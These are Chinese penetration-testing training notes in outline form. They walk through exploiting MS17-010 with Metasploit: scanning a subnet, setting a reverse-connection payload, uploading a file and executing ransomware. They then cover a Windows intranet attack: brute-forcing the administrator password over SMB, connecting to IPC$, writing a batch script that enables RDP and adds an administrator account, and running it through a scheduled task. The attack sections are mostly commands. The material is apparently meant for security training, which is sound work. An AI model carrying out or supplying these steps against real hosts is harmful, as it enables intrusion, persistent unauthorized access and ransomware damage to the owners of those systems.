网络空间安全实训-渗透测试
-  漏洞扫描-  定义 -  扫描和探测目标范围内的主机存在哪些安全漏洞,或扫描目标范围内的那些主机存在某个指定的漏洞 
 
-  
-  漏扫工具 -  AWVS 
-  APPScan 
-  MSF 
 
-  
-  使用MSF扫描漏洞并利用-  1.搜索需要的攻击模块 -  search ms17-010 
 
-  
-  2.使用攻击模块 -  use 模块名称 
 
-  
-  3.设置扫描范围 -  set rhosts 192.168.12.0/24 
 
-  
-  4.设置扫描线程 -  set thread 50 
 
-  
-  5.开始扫描 -  run 
 
-  
-  6.更换攻击模块为漏洞利用 
-  7.查看可用攻击载荷 -  show payloads 
 
-  
-  8.设置攻击载荷 -  set payload 攻击载荷名称 
 
-  
-  9.设置被攻击主机IP地址 -  set rhost IP地址 
 
-  
-  10.设置反向连接的控制机IP地址 -  set lhost IP地址 
 
-  
-  11.开始攻击 -  run 
 
-  
-  12.上传病毒 -  upload 本地文件路径 远程主机路径 
 
-  
-  13.执行勒索病毒 -  execute -f 勒索病毒路径 
 
-  
 
-  
 
-  
-  Windows内网渗透-  1.扫描对方操作系统和开放的端口-  确定对方是Windows系统开启了445接口 
 
-  
-  2.针对该端口服务暴力破解Windows管理员账号密码
-  3.与对方建立空连接-  net use \\对方ip地址\ipc$ 
-  需要输入对方的管理员账号密码 
 
-  
-  4.制作开启RDP和创建管理员账户的脚本bat-  REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 
-  net user 用户名 密码 /add 
-  net local group administrator 用户名 /add 
 
-  
-  5.访问对方C盘默认共享,将bat复制到对方C盘-  在文件资源管理器地址栏中输入 \\对方IP地址\c$ 
 
-  
-  6.查看对方的系统时间-  net time \\对方IP地址 
 
-  
-  7.给对方创建任务计划,定时执行BAT程序,开启RDP-  at \\对方ip地址 时间 执行的文件路径 
 
-  
-  8.使用先前创建的管理员账号登陆RDP
 
-  
